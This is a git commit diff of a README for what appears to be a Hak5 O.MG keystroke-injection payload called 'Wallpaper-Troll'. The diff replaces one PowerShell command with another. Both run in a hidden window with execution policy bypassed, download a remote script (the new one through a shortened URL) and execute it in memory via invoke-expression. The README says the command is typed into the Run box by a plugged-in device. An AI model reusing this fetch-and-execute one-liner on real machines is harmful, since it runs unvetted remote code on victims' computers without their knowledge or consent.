Update README.md
This commit is contained in:
parent
8aec18eebd
commit
62cc83dbb7
1 changed files with 1 additions and 1 deletions
|
@ -39,7 +39,7 @@ Opening the image on their desktop with NotePad will reveal the binary code with
|
||||||
* Plug in your device
|
* Plug in your device
|
||||||
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
||||||
```
|
```
|
||||||
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-Wallpaper-Troll/Wallpaper-Troll.ps1?dl=1?dl=1; invoke-expression $pl
|
powershell -w h -NoP -NonI -Ep Bypass iwr jakoby.lol/b8n | iex
|
||||||
```
|
```
|
||||||
|
|
||||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||||
|
|
Loading…
Reference in a new issue